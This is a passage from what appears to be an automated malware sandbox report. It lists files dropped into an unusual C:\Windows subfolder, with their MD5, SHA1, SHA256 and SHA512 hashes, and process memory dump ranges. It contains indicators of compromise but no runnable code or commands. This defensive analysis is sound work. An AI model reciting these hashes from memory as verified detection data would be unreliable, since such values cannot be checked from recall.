
                                                                                                                          SHA512

                                                                                                                          74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                        • C:\Windows\tteyulnen\igasksjja\eblttilyr.exe
                                                                                                                          Filesize

                                                                                                                          332KB

                                                                                                                          MD5

                                                                                                                          ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                          SHA1

                                                                                                                          fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                          SHA256

                                                                                                                          4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                          SHA512

                                                                                                                          7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                        • C:\Windows\tteyulnen\igasksjja\wpcap.exe
                                                                                                                          Filesize

                                                                                                                          424KB

                                                                                                                          MD5

                                                                                                                          e9c001647c67e12666f27f9984778ad6

                                                                                                                          SHA1

                                                                                                                          51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                          SHA256

                                                                                                                          7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                          SHA512

                                                                                                                          56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                        • memory/1248-77-0x0000000000E50000-0x0000000000E9C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/1648-175-0x00007FF77CCD0000-0x00007FF77CD2B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          364KB

                                                                                                                        • memory/1648-171-0x00007FF77CCD0000-0x00007FF77CD2B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          364KB

                                                                                                                        • memory/1940-144-0x00007FF77CCD0000-0x00007FF77CD2B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          364KB

                                                                                                                        • memory/1940-153-0x00007FF77CCD0000-0x00007FF77CD2B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          364KB

                                                                                                                        • memory/2452-170-0x00007FF7E67E0000-0x00007FF7E6900000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/2452-172-0x00007FF7E67E0000-0x00007FF7E6900000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/2452-148-0x000001FBA8BF0000-0x000001FBA8BF4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/2452-149-0x000001FBA89D0000-0x000001FBA89D4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/2452-147-0x000001FBA87B0000-0x000001FBA87C0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/2452-150-0x000001FBA9040000-0x000001FBA9044000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/2452-151-0x000001FBA8E20000-0x000001FBA8E24000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/2452-173-0x00007FF7E67E0000-0x00007FF7E6900000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/2452-140-0x00007FF7E67E0000-0x00007FF7E6900000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/2452-177-0x000001FBA8BF0000-0x000001FBA8BF4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          16KB

                                                                                                                        • memory/2456-160-0x0000000010000000-0x0000000010008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/4160-7-0x0000000000400000-0x0000000000AA4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          6.6MB

                                                                                                                        • memory/4948-136-0x00007FF78A1B0000-0x00007FF78A29E000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          952KB

                                                                                                                        • memory/4948-135-0x00007FF78A1B0000-0x00007FF78A29E000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          952KB

                                                                                                                        • memory/4956-0-0x0000000000400000-0x0000000000AA4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          6.6MB